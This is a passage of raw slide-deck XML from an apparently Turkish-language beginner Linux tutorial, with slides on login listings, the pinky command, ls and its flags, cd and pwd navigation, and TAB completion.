              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="2E95D3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>     pts/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>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192.168.1.100</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>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18</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> -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20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00</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02</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="2E95D3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>     pts/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>0</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192.168.1.100</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>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16</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> -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18</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00</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02</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>reboot   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="2E95D3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> boot  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>4.15.0-156</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>-ge   Wed </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Dec</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7</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>15</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   still </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="2E95D3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>running </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Google Shape;146;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4399600" y="1959425"/>
            <a:ext cx="4596600" cy="1120200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="666666"/>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50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> $ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>pinky</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>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lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>#kullanıcıların bilgilerini gösteren bir Linux komutudur.</a:t>
            </a:r>
            <a:endParaRPr sz="95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50">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Login Name       Tty    Idle  Login </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Time</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> Office Office Phone</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="95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50">
                <a:solidFill>
                  <a:srgbClr val="2E95D3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  John Doe   pts/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Dec</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>15</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>30</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> (:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="950">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:srgbClr val="2E95D3"/>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0" name="Shape 150"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Google Shape;151;p2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Klasör içeriği listeleme komutu: ls</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Google Shape;152;p23"/>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total 64</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drwxr-xr-x  16 user  staff   512 Mar 17 11:44 .</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drwxr-xr-x  18 user  staff   576 Mar 17 10:47 ..</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-rw-r--r--   1 user  staff     0 Mar 17 11:23 .file1</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-rw-r--r--   1 user  staff     0 Mar 17 11:23 .file2</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drwxr-xr-x   4 user  staff   128 Mar 17 11:36 folder1</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drwxr-xr-x   4 user  staff   128 Mar 17 11:44 folder2</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-rw-r--r--   1 user  staff  1656 Mar 17 11:23 index.html</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="9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900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>-rw-r--r--   1 user  staff     0 Mar 17 11:23 script.js</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Google Shape;153;p23"/>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ls -alh</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p23"/>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komut, mevcut dizindeki dosya ve klasörleri listeler.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Parametreleri:</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-a: Gizli dosyalar dahil tüm dosya ve klasörleri listeler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 Long output</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 Human readable</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-t: Zamana göre sırala</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-r: Ters sırala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-R: Alt klasörlerin içeriklerinide gösterir.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-X: İsim yerine uzantıya göre alfabetik sıralama</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8" name="Shape 158"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Google Shape;159;p2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Klasörler (dizinler) arası gezinme komutu: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Google Shape;160;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1763475"/>
            <a:ext cx="4115400" cy="28053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/home/user/Documents</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;161;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413650" y="679925"/>
            <a:ext cx="4635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chemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>pwd komutu mevcut çalışma dizini gösterir.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:schemeClr val="lt1"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> komutu, belirtilen dizine geçiş yapar. Dizinler arası gezinmeyi sağlar.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Örnekler:</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Bir üst dizin</a:t>
            </a:r>
            <a:endParaRPr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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Üç üst dizin</a:t>
            </a:r>
            <a:endParaRPr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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Root dizini</a:t>
            </a:r>
            <a:endParaRPr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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Mevcut kullanıcının dizini</a:t>
            </a:r>
            <a:endParaRPr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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Mevcut kullanıcının dizini</a:t>
            </a:r>
            <a:endParaRPr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~john </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>#john kullanıcı dizini</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Google Shape;162;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="679925"/>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cd Documents</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Google Shape;163;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1221700"/>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pwd</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Tamamlama komutu &lt;TAB&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Google Shape;169;p25"/>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200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
